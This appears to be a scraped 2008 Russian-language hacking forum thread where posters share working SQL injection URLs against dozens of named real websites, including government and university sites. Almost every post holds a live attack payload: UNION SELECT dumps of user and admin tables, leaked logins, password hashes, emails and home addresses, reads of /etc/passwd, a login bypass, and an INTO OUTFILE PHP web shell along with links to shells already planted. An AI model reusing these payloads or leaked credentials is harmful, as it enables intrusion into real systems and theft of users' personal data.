http://www.bbw.ro
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat_ws(0x203a20,ve rsion(),user(),database()),7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
админка тут http://www.bbw.ro/admin/login.php
version()= 5.0.45
user() = draft@localhost
database() = bbw
emspost.ru
VERSION() 4.1.22-log
DATABASE() emspost_1
USER() emspost_1@localhost
Версия 4, такчто всё подобрано руками :cool:
Сразу под парсер, разбивать по :::
http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0 x3a3a3a,id,name,company,email,city,address,phone,l ogin,pwd),0x3a3a3a),6,7,8,9+FROM+ems_clients+LIMIT +0,1/*
http://emspost.ru/adm/ админка, но пассы хз где
http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0 x3a3a3a,id,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_u sers+LIMIT+1,1/*
эти не подходят
Nightmarе
02.08.2008, 05:07
http://www.bbw.ro
админка тут http://www.bbw.ro/admin/login.php
version()= 5.0.45
user() = draft@localhost
database() = bbw
Итак, вот что мне удалось обнаружить.
С помощью нехитрой фишки "TABLE_NAME", обнаруживаем 2 интересные таблицы под названиями "members" и "admin"
Надо было выяснить название колонок с помощью "COLUMN_NAME", я попробовал так:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE _NAME='members'/*
Но не тут-то было, кавычки фильтруются, но как оказалось не совсем =)) А вот так:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE _NAME=%27members%27/*
Всё работает замечательно.
Достаём интересные данные, из таблицы "members" под названиями "email" - мыло, "adresa" - домашний адрес, "parola" - типа так они пароль обозначили. "telefon" - домашний телефон.
Ну собственно выводим их:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat(email,0x3a,par ola,0x3a,telefon,0x3a,adresa),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM +members+limit+1,1/*
В итоге "мыло:пасс:телефон:адрес" жаль цикл не пашет ;(
Теперь дальше самое интересное, таблица "admin" интересные колонки это username, и собственно parola
Выводим:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat(username,0x3a, parola),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29+FROM+admin+limit+0,1/*
И получаем данные для админки: bbw:qazxcv
В админке ковыряться не стал - не интересно.
Nightmarе
02.08.2008, 07:19
http://ipz.ru
PR 5 Яндекс тИЦ 325
Система рейтингующей статистики - IPZ
SQL: http://www.ipz.ru/alltop.php?cat='
Полей - 1, таблица с юзверями - users
Выводим инфу о юзверях:
http://www.ipz.ru/alltop.php?cat=-1+UNION+SELECT+concat(login,0x3a,email,0x3a,passwo rd)+FROM+users+limit+0,1/*
Логин:Емайл:Пароль:*(расшиф ованный пароль)
consider1:consider@gips-s.ru:5a4c36e900fb4d0a947751e0c59d8661:7827887
А так-же пых-пыхМайАдмин: http://www.ipz.ru/phpmyadmin
Версия:Пользователь:База данных
5.0.22:admin_top@localhost:admin_top
Business-academy.ru
http://www.business-academy.ru/lib.php?id=-1+union+select+1,table_name,table_schema,4,5+from+ information_schema.tables--
5 ветка и таблы..
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,nick,pass),3,4,5+f rom+auth--
business-academy.ru/auth.form.php
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5+from+affil_admin--
business-academy.ru/admin - 403
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5+from+affil_users+limit+0,1--
еще какието юзверы )
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,members_l_username ,member_login_key),3,4,5+from+ibf_members--
и форум... business-academy.ru/forum - IPB 2.2.2 - хотел шелл залить.. но пасс так не разшифровал:
lenar:ee0801a9fb2b272b10830d0ffcf8c589
red_bar0n:84c1b6bd2d4b190b1583e11bf4ccd929
s2sage:f7ea695c3b11000daedb0db1f7dd5619
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,email,password),3, 4,5+from+srv11037_forum.users--
напоследок.. еще юзеры...
Lor-homeopat.ru - PR 4
http://lor-homeopat.ru/php/content.php?id=209+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19/*
Launion.gov.ph - PR 3
http://www.launion.gov.ph/index.php?option=com_remository&Itemid=99999999&func=select&id=1&orderby=3&page=2
пытался чтот сделать... но (
Bbw.ro
http://www.bbw.ro/admin/login.php
login: admin' or 1=1/*
pass: любой
Ну что ж... Начну и я пожалуй:
qpogorod.ru
http://www.qpogorod.ru/raskazread.php?idArticle=-32+union+select+concat_ws(version(),0x3a,user()),2 ,3--
4.0.27
autoanry_cvet@v24.valuehost.ru
Сервер:
Apache/1.3.33 (Unix) mod_fastcgi/2.4.0 FrontPage/5.0.2.2623 PHP/4.3.10 mod_gzip/1.3.19.1a mod_ssl/2.8.22 OpenSSL/0.9.7b rus/PL30.20
P.S: админку не нашел, так что дальше не раскручивал.
http://www.latinoreview.com/news.php?id=-1890+union+select+1,2,concat_ws(0x3a,user(),databa se(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21/*
version() - 4.1.20
user() - latinore_content@localhost
database() - latinore_content
http://www.greenshift.com/news.php?id=97+union+select+1,concat_ws(0x3a,user( ),database(),version()),3,4,5,6,7,8,9,10,11,12/*
version() - 4.1.21-standard
user() - root@localhost
database() - greenshift
http://www.a2k.org.ua/news.php?id=31+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version()),6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38/*
version() - 4.1.22-standard
user() - boxnews_a2k@localhost
database() - boxnews_a2k
http://www.krasota.ru
4.1.16-standard-log ::: krasota_v3@lbarbero-12.m-10.ru ::: krasota_v3
http://www.krasota.ru/krasota/news/show.htpl?id=7379+union+select+1,2,3,4,5,6,7,8,unh ex(hex(concat_ws(0x3a3a3a,version(),user(),databas e()))),10,11,12,13/*
таблички подобрать не смог...
админка тут http://www.krasota.ru/admin/
Nightmarе
02.08.2008, 17:54
http://www.lv
PR 6 Яндекс тИЦ 60
Судя по всему, какой-то латвийский каталог
http://www.lv/list.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n(),user(),0x3a,database()))),4,5,6/*
version() - 4.1.15-Debian_1ubuntu5-log
user() - welcome@92.240.65.129
database() - t_welcome
Раскрытие пути - /home/welcome/public_html/list.php
mind.textdriven.com
http://mind.textdriven.com/db/record.php?ID=1+union+select+1,version(),3,0x203a2 0,user(),0x203a20,database(),8,9,10,11,12,13,14,15--
Database : bpasanek_metabase.
Database Version: 4.1.22-log
User: bpasanek@localhost
Nightmarе
03.08.2008, 00:01
http://popsdb.twystneko.com
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3 a,version(),user(),database())))+limit+1,1--
version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /home/virtual/site198/fst/var/www/popsdb/list.php
Админка - http://popsdb.twystneko.com/admin
Далее, база с админом:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3 a,user_login,user_pass,user_email)))+from+nc_users +limit+1,1--
admin:2dfc97e5e093b4b339ad510433d2e9ff:cafe@nakedc ybercafe.com - расшифрованный пасс: naked
Ещё одна база всего с 1 человеком:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3 a,user_login,user_pass,user_email)))+from+bg_users +limit+2,1--
stephen:3e5a1b3b990187c9fb8e8156ce25c243:stephen@i crossroads.com
++++++++++++ Пойдём дальше.
http://dennis-oppenheim.com
http://www.dennis-oppenheim.com/list.php?id=-1+union+select+concat(0x3a,version(),0x3a,user(),0 x3a,database()),1,1/*
version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /hsphere/local/home/rhjo2/dennis-oppenheim.com/list.php
++++++++++++ Пойдём дальше.
http://hivolume.com
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(version(),1 ),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(user(),1),1 ),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(database(), 1),1),555/*
version() - 4.1.11-Max
user() - yads@localhost
database() - hivolume
Раскрытие пути - /home/sites/site4/web/en/list.php
++++++++++++
Так-же отдельное спасибо пользователям "sabe" и "Basurman", за помощь в вопросах по SQL.
Eutrainingsite.com - PR 6
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,table_name,version ()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55+from+information_schema.tables/*
5 ветка.. таблы.
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,jog_szint,jelszo), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5+from+admin/*
/admin - 403
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,nickname,password) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55+from+cusers+limit+0,1/*
/forum.php
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,nickname,password) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55+from+newsletters+limit+0,1/*
редакторы..
Milledcarbon.com - PR 4
http://www.milledcarbon.com/fullNews.php?id=1+union+select+1,2,3,4,version(),6 ,7,8/*
4 ветка, подобрал талицу news )
Bustur.ru - PR 3
http://www.bustur.ru/town.php?id=-75+union+select+1,2,concat_ws(0x3a,table_name,vers ion()),4,5,6+from+information_schema.tables+limit+ 27,1/*
5 ветка и таблы..
Fellini.net.ua - PR 3
http://top.fellini.net.ua/kom.php?id=9999+union+select+mysql.user.user,mysql .user.password,2,3,4,5+from+mysql.user/*
4 ветка, рут.
Cennarios
03.08.2008, 02:02
http://www.rokf.ru/autosale/?s=autos&id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a3a, password,0x3a3a,admin),8,9,10,11,12,13,14,15,16+fr om+phorum_users+limit+0,50/*
Login: admin
pass: adminus
Дешевый админ =)
Есть еще табличка dealers быть может в ней где-то зарыт ключик к
http://www.rokf.ru/admin
Но уж очень геморно рыть этот шлак )
Eggs.net.ua - PR 4
Веселі Яйця
http://eggs.net.ua/game.php?id=-9+union+select+1,table_name,table_schema,version() ,5,6,7,8,9,0+from+information_schema.tables/*
5 ветка и таблы..
http://eggs.net.ua/game.php?id=-9+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,0+from+_Users/*
eggs_admin;eggs210705
http://eggs.net.ua/game.php?id=-9+union+select+1,concat_ws(0x3a,ah_name,ah_pass),3 ,4,5,6,7,8,9,0+from+fn_auth/*
еще пассы..
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex(concat_ws(0x3a,name,cle ar,crypt))),3,4,5,6,7,8,9,0+from+maildb.users/*
мыльники..
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex(concat_ws(0x3a,user,pas sword))),3,4,5,6,7,8,9,0+from+mysql.user/*
и самое вкусное..)
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex(load_file(0x2F6574632F7 06173737764))),3,4,5,6,7,8,9,10/*
file_priv y
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex('%3C?php%20eval($_GET[cmd]);?%3E')),3,4,5,6,7,8,9,0+into+outfile+'/tmp/vital.php'/*
залили шелл..)
Pangkalpinang.go.id - PR 3
http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,version(),4,table_name,6,7,8+fr om+information_schema.tables+limit+24,1
5 ветка и таблы-мазахистов.)
http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,3,4,concat_ws(0x3a,fullname,pas sword),6,7,8+from+f011
/admin
Mypspwebsite.com
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(user,0x3 a,password),4,5,6,load_file(0x2f6574632f7061737377 64),8,9,version(),user()+from+mysql.user--
рут.. и /admin/members/default.php
Cyberblue.it-lighthouse.com
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(username ,0x3a,password),4,5,6,7,8,9,10,11+from+cyberblue.u sers--
юзеры )
It-lighthouse.com
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(username ,0x3a,password),4,5,6,7,8,9,10,11+from+itl_databas etables.itl_jobStaff--
непонятные пароли ;)
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(user_nam e,0x3a,user_password),4,5,6,7,8,9,10,11+from+arthu r.cpg143_users--
сайт под эту базу не был обнаружен.)
Crestron-home.ru
http://www.crestron-home.ru/catalog/type.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),1 3,14,15,16,17,18,19,20/*
Animedvd.ru
http://www.animedvd.ru/serial.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,10,11,version(), 13/*
http://una.ge/eng/artdetail.php?group=articles&id=102
http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,version(),4,5,6,7,8,9
http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,table_name,4,5,6,7,8,9+fro m+information_schema.tables+limit+16,10
Дальше сам крути
www.cyberthing.net
http://www.cyberthing.net/video-play.php?id=9999999999+union+select+1,2,3,4,5,6,7/*
5.0.22-Debian_0ubuntu6.06.10-log
http://eggs.net.ua/game.php?id=-9+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,0+from+_Users/
не ту взял , та "4"-ка =)
Eggs.net.ua - PR 4
Веселі Яйця
5 ветка и таблы..
eggs_admin;eggs210705
еще пассы..
мыльники..
и самое вкусное..)
file_priv y
БАЯН! уже второй раз постишь :mad:
http://www.google.ru/search?complete=1&hl=en&newwindow=1&q=site%3Aforum.antichat.ru+eggs.net.ua&btnG=Search&aq=f
Astrakhanfm.ru - PR 4
http://www.astrakhanfm.ru/guest/book.php?id=-12+union+select+1,2,version(),4,5,6,7,8,9--
Glier.ru - PR 3
http://www.glier.ru/dsp.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,table_na me),8,9,10,11,12,13,14+from+information_schema.tab les+limit+17,1/*&did=9999
5 версия, таблы..
http://www.glier.ru/dsp.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,pa ss),8,9,10,11,12,13,14+from+admins+limit+0,1/*&did=9999
/admin
Activetoy.co.uk - PR 3
http://www.activetoy.co.uk/product.php?id=699+union+select+unhex(hex(versio() )),2,3,4,5+limit+1,1/*
Kenzahealth.co.za
http://www.kenzahealth.co.za/shop.php?id=0+union+all+select+1,2,version(),4,6,c oncat_ws(0x3a,table_name)+from+information_schema. tables+limit+28,1--
5 ветка, нужная нам таблица...
http://www.kenzahealth.co.za/shop.php?id=0+union+all+select+1,2,version(),4,6,c oncat_ws(0x3a,username,password)+from+ispcdb.membe r_login--
мемберы..
http://www.kenzahealth.co.za/shop.php?id=0+union+all+select+1,2,version(),4,6,c oncat_ws(0x3a,user,password)+from+mysql.user--
рут....
Ash-graphics.co.uk
http://www.ash-graphics.co.uk/news-page.php?id=-27+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
Robappelhof.com
http://www.robappelhof.com/view.php?sub=yes&id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord,version()),5,6,7,8,9+from+users/*
Chichomerida.com
http://www.chichomerida.com/Departamentos/eng/detalles.php?id=-1+union+select+all+1,2,3,4,version(),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49/*
Nea7
ты думаеш я помню что выкладывал ? ты знаеш через сколько сайтов мои руки проходят ? тем более то что выкладовал уже не актуально! + в антибояне нету!
не работает ... пустая страница вылезает, и что значит это ??:
/forum
/admin
diso.interatletika.com
http://diso.interatletika.com/index.php?option=com_simpleshop&task=browse&Itemid=92&catid=-1+UNION+SELECT+1,2,3,4,5,6,7,8%23
VERSION(): 5.0.51a-community
DATABASE(): interatlet_diso
USER(): interatlet_diso@localhost
Radioas.ro - PR 4
http://www.radioas.ro/index.php?id=-1'+union+select+unhex(hex(concat_ws(0x3a,table_nam e,table_schema,version())))+from+information_schem a.tables/*
5 ветка.. таблы и phpbb ))
http://www.radioas.ro/index.php?id=-1'+union+select+unhex(hex(concat_ws(0x3a,username, user_password)))+from+phpbb_users+limit+1,1/*
получайем доступ к форуму: /forum
radioasforum;pswd13
пытался залить шелл... но неудача, навреника нету прав на запись аватарок (
если кто что зальет пишите..)
Yelli.co.il - PR 4
http://www.yelli.co.il/index2.php?id=7&lang=eng&catId=1&productId=-1+union+select+concat_ws(0x3a,table_name,version() )+from+information_schema.tables/*
5 ветка, вывод таблиц в сорсе..
http://www.yelli.co.il/index2.php?id=7&lang=eng&catId=1&productId=-1+union+select+concat_ws(0x3a,username,password,ve rsion())+from+clubMembers+limit+5,1/*
мемберы..
Surcon.ru - PR 4
http://www.surcon.ru/maps/articles.php?id=-1+union+select+1,2,3,4,table_name,6,7,8+from+infor mation_schema.tables+limit+39,1/*
5 ветка и таблы..
http://www.surcon.ru/maps/articles.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,passwo rd),6,7,8+from+users/*
Teamcalendars.co.uk
http://www.teamcalendars.co.uk/index.php?p=product_detail&id=9999999+union+select+table_name+from+informatio n_schema.tables+limit+18,1/*
5 ветка, таблы.
http://www.teamcalendars.co.uk/index.php?p=product_detail&id=9999999+union+select+concat_ws(0x3a,username,pa ssword)+from+admin/*
/admin
http://www.teamcalendars.co.uk/index.php?p=product_detail&id=9999999+union+select+concat_ws(0x3a,email,passw ord)+from+users/*
/index.php?p=Upload
Stars.com.ua
http://stars.com.ua/models/_show_whole_kasting.php?page=2&id=-41+union+select+1,2,version(),4,5/*
Cennarios
04.08.2008, 00:32
http://www.utsmow.ru/sport/sport.php4?sport_id=-1+union+select+1,2,3,4,5,6,7,8,9
5 мускул, ничего полезного в табличках не обнаружено... ч то-то не катит сегодня...
http://www.tubebrasil.com.br/ugroups.php?UID=745/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a,username,pwd),8,9,0,1,2 ,3,4,5,6,7,8/**/from/**/%73%69%67%6E%75%70--
admin:969d4931173451a004d2a3f6037e162c
Rustavi2.com - PR 4
http://rustavi2.com/news/full_prog.php?id_news=&ct=9999999+union+select+unhex(hex(table_name)),2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+informat ion_schema.tables/*
меня очень порадовал здесь вывод... LASTEST NEWS: и идет перебор таблиц с интервалом в сек.))
http://rustavi2.com/news/full_prog.php?id_news=&ct=9999999+union+select+unhex(hex(concat_ws(0x3a,u srname,pass))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+users_p/*
так же красиво просматриваем юзеров..
Eaststaffsbc.gov.uk - PR 4
http://www.eaststaffsbc.gov.uk/index.php?fuseaction=services.servicedetails&id=-39+union+select+concat_ws(0x3a,username,password,v ersion()),2,3+from+users--
Guillembalague.com - PR 4
http://www.guillembalague.com/blog_desp.php?id=-48+union+select+1,2,version(),4,5,6,7,8,9,10,11,12/*
Gkovacs.de - PR 3
http://www.gkovacs.de/forum/showboard.php?id=-1+union+select+1,table_name,version(),4,5,6,7,tabl e_schema,9+from+information_schema.tables/*
5 ветка, таблы..
http://www.gkovacs.de/forum/showboard.php?id=-1+union+select+1,unhex(hex(concat_ws(0x3a,username ,passwort))),3,4,5,6,7,8,9+from+cebb_user+limit+1, 1/*
пароли..
Astrotur.ru - PR 3
http://www.astrotur.ru/index1.php?id=-1+union+select+1,2,version()+from+news/*
Санкт-Петербугский Государственный Университет Гражданской Авиации
http://www.academiaga.ru/index.php?id=-1+union+select+concat(nick,0x27,password,0x27,emai l,0x27,id),2,3,4+from+users+limit+1,1311/*&lang=0
http://www.yavlinsky.ru
http://www.yavlinsky.ru/photos/parents/index.phtml?id=1094+and+3=substirng(version(),1,1)
сайт веселый)
но кроме как того,что на нем 3 ветка ничего сказать не могу..
вот вам и апача
http://modules.apache.org/search.php?id=-1+union+select+1,concat_ws(char(58),apassword,aema il),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ access/*
https://forum.antichat.ru/thread79372.html ?
~!DoK_tOR!~
04.08.2008, 03:22
http://modules.apache.org/search.php?id=-1+union+select+1,concat_ws(char(58),apassword,aema il),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ access/*
мистр вы обнаглели ?
Jordanpost.com.jo - PR 5
http://www.jordanpost.com.jo/inner_en.php?type=2&id=null+union+select+concat_ws(0x3a,table_name)+fr om+information_schema.tables+limit+16,1/*
5 версия мускуля, таблицы)
Montrealmedia.com - PR 5
http://www.montrealmedia.com/archive.php?ID=-1+union+select+all+1,2,3,4,5,6,7,version(),9/*
Khan.co.il - PR 5
Еврейский теарт)
http://www.khan.co.il/news_item_english.php?id=-75+union+select+1,version(),3,4,5,6,7/*
Mahkamahkonstitusi.go.id - PR 5
http://www.mahkamahkonstitusi.go.id/eng/berita.php?newscode=1'+union+select+1,2,3,4,5,6,ve rsion(),8,9,10,11,12/*
Toeic.com.vn - PR 4
http://www.toeic.com.vn/info/details.php?id=-276+union+select+1,2,table_name,4,5,table_schema,7 +from+information_schema.tables+limit+17,1--
5 ветка, таблы..
http://www.toeic.com.vn/info/details.php?id=-276+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7+from+users--
админка (http://forum.antichat.ru/showpost.php?p=800706&postcount=541)
Complete-gardens.co.uk - PR 4
http://www.complete-gardens.co.uk/online/online-browse-plant-garden-suppliers-list.php?cat=1&subcat=-1+union+select+1,version(),3--
4 ветка..
Linkstorm.com - PR 3
http://www.linkstorm.com/news_desc.php?id=-1+union+select+1,2,3,4,table_name+from+information _schema.tables+limit+28,1--
5 ver. tables.
http://www.linkstorm.com/news_desc.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,sbuser_name, sbuser_pwd)+from+sblnk_members--
мемберы..
http://www.linkstorm.com/news_desc.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword)+from+sblnk_admin--
/admin - 403
Cistyle.de
http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables+limit+17,1/*
5 ветка и таблы.
http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,2,3,concat_ws(0x3a,user,password) ,5,6+from+user/*
admin:login
Начинаю осваиваться :)
facasper.com.br (какой-то Бразильский сайт)
http://www.facasper.com.br/jo/unotas.php?sub_categoria=-16+union+select+1,2,3,concat_ws(version(),0x3a,use r()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
user - logjo-new@herzog-new.fcl.com.br
version - 5.0.24a-standard
Таблицы (from information_schema):
http://www.facasper.com.br/jo/unotas.php?sub_categoria=-16+union+select+1,2,3,concat_ws(table_name,table_s chema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+fro m+information_schema.tables/*
Раскрытие пути:
/usr/local/apache/htdocs/facasper.com.br/pos/nucleo_pesquisa/edicao/conexao/
.edu
http://www.msse.umn.edu/alumni_calendar.php?id=199'union+select+1,2,unhex( hex(concat_ws(version(),0x3a,user()))),4,5,6,7,8,9 ,10/*
version - 5.0.18
user - umsec@sabinus.cs.umn.edu
Юзеров с паролями не нашел, т.к. то таблицы нет, то доступ запрещен.
P.S: отдельная благодарность aka PSIH, sabe и Ershik за помощь с функциями кодировки :)
Riptopia.com - PR 5
http://www.riptopia.com/news.php?id=1'+union+select+1,2,version(),4,5,6/*
5 ветка.... и нече интересного в базе..
http://www.riptopia.com/news.php?id=1'+union+select+1,2,load_file(0x2F6574 632F706173737764),4,5,6/*
это уже интереснее..
Tv-live.ro
http://www.tv-live.ro/radio-live.php?id=-1+union+select+1,version(),3,4,5,6/*
Bugstrainingcenter.com
http://www.bugstrainingcenter.com/webring.php?id=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables
5 ветка и таблы... но сам сайт очень медленый..
http://www.bugstrainingcenter.com/webring.php?id=-1+union+select+1,2,3,username,pass,6+from+user
Metabras.ro
http://www.metabras.ro/news.php?id=-62+union+select+1,version(),3,4,5,6,7,8--
Ghanadate.co.uk
http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),version(),5,6,7 ,8,9,10/**/from/**/members/*
Scarsdalecoops.com
http://scarsdalecoops.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,username, password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*
Sb-fitnes.net
http://sb-fitnes.net/trainers.php?t=2&ID=-1%20union%20select%201,2,concat_ws(0x22,table_name ,column_name),4,5,6,7,8,9,10,11%20from%20informati on_schema.columns%20limit%201%20offset%20213--
Danielletaaffe.com
http://www.danielletaaffe.com/shop.php?id=154&cat=47&action=shop&contentid=3%20union%20all%20select%201,2,concat_ws (0x2020203a2020203c62723e,table_name,table_schema) ,4,5,6,7+from+information_schema.tables
http://pravostok.ru/adm/
admin:Cr#27Ma
шелл
http://pravostok.ru/uploaded/Alaska/148.php
http://pravostok.ru/ru/updates/index.php?from=10&id=-%2099999+union+select+1,2,concat_ws(0x3a,ADMINISTR ATOR_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10,%20%201 1,12,13,14+from+ADMINISTRATOR/*
посмотрите пожалуйста что там и как
Cowcanfly
05.08.2008, 18:06
Помогите с http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1'+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
Названия таблиц выводятся, но при попытке вывести данные
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1%27+union+select+1,2,3,concat_ws(0x3a,name,member _login_key)+from+ibf_members+limit+0,1/*
автоматически добавляет site.news к названию таблицы, и пишет что такой то таблицы нету
http://www.mongoliatourism.gov.mn
4 ветка,полей для вывода нет,нашел нефильтруемый параметр id в index.php и download.php
есть табличка users с колонками id,name,pass
http://www.mongoliatourism.gov.mn/download.php?id=7+and+1=if(ascii(substring((select +concat(name,pass)+from+users+limit+0,1),1,1))>1,1,0)/*
http://www.must-library.edu.mn
Очень бажный сайт,
3 версия мускула...
http://www.must-library.edu.mn/web-page/index.php?top_id=2&id=2'+and+3=substring(version(),1,1)/*
Chemeng.technion.ac.il - PR 6
http://chemeng.technion.ac.il/person_page.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13/*
Spatialinformationdesignlab.org - PR 6
columbia university organization
http://www.spatialinformationdesignlab.org/projects.php?id=-16+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,32,33,34/*
Pzb.com.pl - PR 4
http://www.pzb.com.pl/index.php?co=wiecej&id=521&dzial=96%20and%201=2%20union%20select%201,2,versio n(),4,5,6,7,8/*
Infokom-sulteng.go.id - PR 3
http://www.infokom-sulteng.go.id/cetakberita.php?id=-641+union+select+1,2,3,table_name,5+from+informati on_schema.tables+limit+17,1--
5 ver. tables..
http://www.infokom-sulteng.go.id/cetakberita.php?id=-641+union+select+1,2,3,unhex(hex(concat_ws(0x3a,us ername,password))),5+from+infokom_infokom.bktmst_a uth--
Mojmac.com
http://www.mojmac.com/clanek.php?id=-38+union+select+1,2,version(),4,5,6,7,8/*
Cashsavings2003.com
http://www.cashsavings2003.com/category.php?id=-1+union+select+all+1,2,3,4,version(),6,7,8,9,10,11--
Cowcanfly
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1'+union+select+1,table_name,3,table_schema+from+i nformation_schema.tables/*
сморим таблицы... и базы в которых они находятся..
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1%27+union+select+1,unhex(hex(concat_ws(0x3a,name, member_login_key))),3,4+from+forum.ibf_members/*
а вот и все юзеры.. )
http://www.disasterinfo.mn
version() = 5.0.22-Debian_0ubuntu6.06-log
user() = root@localhost
database() = forum
смотрим все таблички
